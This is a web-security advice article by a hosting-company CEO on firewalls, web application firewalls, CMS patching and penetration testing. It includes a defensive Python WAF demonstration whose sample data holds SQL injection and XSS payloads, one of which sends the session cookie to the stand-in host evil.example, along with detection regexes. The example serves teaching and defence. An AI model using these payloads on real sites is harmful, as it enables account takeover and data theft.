Top tips from Lawrence Jones, founder and CEO of UKFast, on how to keep your website safe from malicious threats this Christmas.
Data loss and downtime are arguably the two scariest terms for businesses operating on the internet these days. The reputational damage and heavy fines that can come from being hacked and leaking information are enough to bring a company to its knees. You can trust me when it comes to this; during UKFast’s fifteen years, I’ve seen grown men and women in tears thinking that everything they’d worked so hard for was falling apart. Fortunately, when most of these people came to us asking for help, we’ve been able to provide it, but there are preventative and proactive ways to protect against online threats and make sure your website is always available for customers.
Getting the basics right
Firewalls and Web Application Firewalls
Whilst most businesses are taking security really seriously, there are still some huge brand names operating online without the basic safeguards in place. For example, some are reluctant to spend money on a dedicated firewall; and firewalls, whilst not bulletproof, are still an essential part of protecting your website – and your business – from harm. If you use a shared hosting platform, ask your hosting provider whether all of its users are behind a firewall. In my opinion, they should be. Wherever possible, I would always recommend a dedicated firewall, and I really can’t stress how important this is. Put simply, a server without a firewall in front of it is exposed directly to the internet: every service listening on it, not just the web server, is reachable by anyone who cares to look.
For extra protection, a web application firewall (WAF) can be placed behind your normal firewall, analysing inbound HTTP and HTTPS traffic for suspicious activity. In more targeted attacks, a hacker might try to exploit weaknesses in your application code. These attacks are disguised as genuine requests made to forms on your website: the right URL, the right method, the right field names, but with malicious content in the field values. To a traditional firewall, which only looks at addresses and ports, they appear authentic, but a WAF inspects the request content itself for cross-site scripting, SQL injection and other types of attack. Bear in mind that a WAF works largely by matching known attack patterns, so it can miss a payload it has not seen before (or one that has been obfuscated) and can occasionally block a legitimate request that happens to look like one. It is a safety net in front of your code, not a substitute for fixing the code.
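To make the last point concrete, here is a small request inspector of the kind a WAF runs on every form submission. This is an added example written for this article, not code from UKFast or from any WAF product; the sample submissions and the signature list are constructed for illustration and are far smaller than a real rule set. It shows three things the paragraph above describes: a benign login and an injected one look identical to a network firewall and differ only in field content; an attacker can hide a payload behind URL encoding, so the inspector must decode before matching; and signature matching has false positives.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample form submissions (field -> raw value), as a WAF would
# see them in the body of a POST to a login or search form. Not real traffic.
SAMPLE_REQUESTS = {
    "benign_login": {"user": "alice", "pass": "correct horse battery"},
    # Classic authentication bypass: closes the quoted string, adds OR 1=1,
    # then comments out the rest of the original query.
    "sqli_login": {"user": "admin' OR '1'='1' -- ", "pass": "x"},
    # Stored/reflected XSS attempt that exfiltrates the session cookie.
    "xss_search": {
        "q": "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    },
    # Same UNION attack, but percent-encoded once (as a browser would send it).
    "encoded_sqli": {"id": "1%20UNION%20SELECT%20username%2Cpassword%20FROM%20users"},
    # Payload percent-encoded twice to slip past a single-pass decoder.
    "double_encoded_xss": {"name": "%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E"},
    # Perfectly innocent search that happens to contain "union select".
    "false_positive_search": {"q": "union select committee minutes"},
}

# Deliberately minimal signatures; a production WAF has hundreds of these.
SQLI_PATTERNS = [
    re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+", re.I),   # ' OR '1'='1
    re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I),  # UNION SELECT
    re.compile(r"(--|#|/\*)\s*$"),                         # trailing SQL comment
    re.compile(r";\s*(drop|delete|insert|update)\b", re.I),  # stacked query
]
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),   # <script> tag
    re.compile(r"\bon\w+\s*=", re.I),    # onerror=, onload=, ... event handlers
    re.compile(r"javascript\s*:", re.I),  # javascript: URLs
]


def normalise(value: str, decode_rounds: int = 3) -> str:
    """Percent-decode repeatedly (up to decode_rounds) until the value stops
    changing, so that singly or doubly encoded payloads hit the same rules."""
    for _ in range(decode_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(params: dict, decode_rounds: int = 3) -> list:
    """Return a list of (field, category, pattern) findings for one request."""
    findings = []
    for field, raw in params.items():
        value = normalise(raw, decode_rounds)
        for category, patterns in (("sqli", SQLI_PATTERNS), ("xss", XSS_PATTERNS)):
            for pat in patterns:
                if pat.search(value):
                    findings.append((field, category, pat.pattern))
                    break  # one finding per category per field is enough
    return findings


def decide(params: dict, decode_rounds: int = 3) -> str:
    """The WAF's verdict for a request: 'block' on any finding, else 'allow'."""
    return "block" if inspect_request(params, decode_rounds) else "allow"


def classify_all(decode_rounds: int = 3) -> dict:
    """Verdict for every constructed sample request, keyed by its name."""
    return {name: decide(params, decode_rounds) for name, params in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, verdict in classify_all().items():
        print(f"{name:24s} {verdict:5s} {inspect_request(SAMPLE_REQUESTS[name])}")
    # With only one decoding pass the double-encoded XSS payload gets through.
    print("double_encoded_xss, one decode pass:", decide(SAMPLE_REQUESTS["double_encoded_xss"], 1))
```

Run it and the two lessons fall out of the output: `double_encoded_xss` is blocked with the default three decoding passes but allowed with one, which is exactly the kind of evasion a WAF vendor has to keep chasing; and `false_positive_search` is blocked even though it is harmless, which is why a WAF needs tuning against real traffic and why the underlying code still has to use parameterised queries and output encoding rather than relying on the WAF alone.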
When it comes to websites, one of the main problems is code and the constant task of keeping on top of it. A number of content management systems (CMS) are free, such as WordPress and Drupal, which attracts businesses to the idea of managing their own code. The catch is that most of the groundwork has already been done for you: you did not build the software from the ground up, so there are bound to be gaps in your understanding of how it works and what each update changes. As a business owner, you are then faced with a bit of a dilemma; do you keep updating it and risk coming up against problems you don’t know how to fix?
When the software becomes out of date, this is where vulnerabilities accumulate and hackers can get in; once a flaw is public, anyone can scan for sites still running the affected version. In fact, on the day I sat down to write this, a vulnerability was discovered in versions of Drupal 7 before 7.31; yet another example of why it’s so important to stay up to date. For business owners who are finding they’re out of their depth with this, I’d advise taking on a server admin or web developer who understands how to use a server, how to update their code and – if there are problems – how to fix bugs.
For a business website to be running smoothly, you have to have what some of our tech team would describe as the “holy trinity”, which comprises a competent hosting provider doing the infrastructure side of things and keeping the network ticking over; a business owner focussing on his or her primary activities; and a web developer maintaining the CMS.
Generally speaking, it’s good practice for everyone to sign up to the security bulletins for the software they run (the CMS, its plugins and the server software), so that if flaws are found, you hear about them straight away and can get the relevant patches applied quickly and efficiently.
Knowing your weaknesses
You’ve probably heard the expression about how the best way to catch a criminal is to think like one. Penetration testing is a process that basically allows you to do this, showing you what your IT infrastructure looks like from a hacker’s point of view. This is invaluable, because if you notice any chinks in your armour that they could exploit, you can patch them up before they get the chance.
Pen tests are carried out by cybersecurity experts and they usually start off with a vulnerability scan to check whether your network and/or application react to certain inputs as they should, and to catalogue what is exposed: open ports, running services and their versions, and the pages and forms of the application. It basically provides a picture of how a user or attacker could interact with the application. Then, the tester will use that picture to see whether they can break into your system.
Having a real person sitting at a computer, using their brain and their imagination to try and get into your IT infrastructure – just as it would happen in reality – means that your business security really is being tested to breaking point. If your website could be brought down by a hacker, a pen test will flag that up. As the saying goes, knowledge is power. If you know you’re vulnerable, you have the power to fix it.
Lawrence Jones is the founder and CEO of Manchester-based web hosting firm UKFast.